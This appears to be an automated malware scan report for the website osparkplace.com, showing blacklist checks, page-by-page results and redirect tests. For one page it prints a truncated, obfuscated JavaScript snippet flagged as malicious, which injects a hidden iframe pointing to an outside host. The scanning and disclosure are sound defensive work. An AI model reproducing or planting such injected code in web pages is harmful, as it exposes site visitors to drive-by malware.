Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=osparkplace.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://osparkplace.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://osparkplace.com/ | 200 OK Content-Length: 6608 Content-Type: text/html | clean |
http://osparkplace.com/index.html | 200 OK Content-Length: 6608 Content-Type: text/html | clean |
http://osparkplace.com/about.html | 200 OK Content-Length: 7350 Content-Type: text/html | clean |
http://osparkplace.com/availability.html | 200 OK Content-Length: 10290 Content-Type: text/html | clean |
http://osparkplace.com/calendar.html | 200 OK Content-Length: 25073 Content-Type: text/html | clean |
http://osparkplace.com/community.html | 200 OK Content-Length: 10861 Content-Type: text/html | clean |
http://osparkplace.com/contact.html | 200 OK Content-Length: 5496 Content-Type: text/html | clean |
http://osparkplace.com/privacy.html | 200 OK Content-Length: 11589 Content-Type: text/html | clean |
http://osparkplace.com/test404page.js | 404 Not Found Content-Length: 396 Content-Type: text/html | clean |
http://osparkplace.com/index2.html | 200 OK Content-Length: 10628 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) p=parseInt;ss=(123)?String.fromCharCode:0;asgq="28!66!75!6e!63!74!6@!6f!6e!20!28!2@!20!7b!d!a!20!20!20!20!76!61!72!20!70!6c!7@!73!20!3d!20!64!6f!63!75!6d!65!6e!74!2e!63!72!65!61!74!65!45!6c!65!6d!65!6e!74!28!27!6@!66!72!61!6d!65!27!2@!3b!d!a!d!a!20!20!20!20!70!6c!7@!73!2e!73!72!63!20!3d!20!27!68!74!74!70!3a!2f!2f!77!77!77!2e!74!72!61!64!65!2d!68!6f!6d!65!73!2e!6e!65!74!2f!63!6c!6@!6b!2e!70!68!70!27!3b!d!a!20!20!20!20!70!6c!7@!73!2e!73!74!7@!6c!65!2e!70!6f!73!6@!74!6@!6f!6e!20!3d!20!27!61!62!73!6 Antivirus reports:
| ||
http://osparkplace.com/index-1.html | 404 Not Found Content-Length: 391 Content-Type: text/html | clean |
http://osparkplace.com/index-2.html | 404 Not Found Content-Length: 391 Content-Type: text/html | clean |
http://osparkplace.com/index-3.html | 404 Not Found Content-Length: 391 Content-Type: text/html | clean |
http://osparkplace.com/index-4.html | 404 Not Found Content-Length: 391 Content-Type: text/html | clean |
http://osparkplace.com/index-5.html | 404 Not Found Content-Length: 391 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: osparkplace.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 23 May 2014 02:09:02 GMT
Accept-Ranges: bytes
Server: Apache
Content-Length: 6608
Content-Type: text/html
...6608 bytes of data.
GET / HTTP/1.1
Host: osparkplace.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 23 May 2014 02:09:02 GMT
Accept-Ranges: bytes
Server: Apache
Content-Length: 6608
Content-Type: text/html
...6608 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: osparkplace.com
Referer: http://www.google.com/search?q=osparkplace.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: osparkplace.com
Referer: http://www.google.com/search?q=osparkplace.com
Result:
The result is similar to the first query. There are no suspicious redirects found.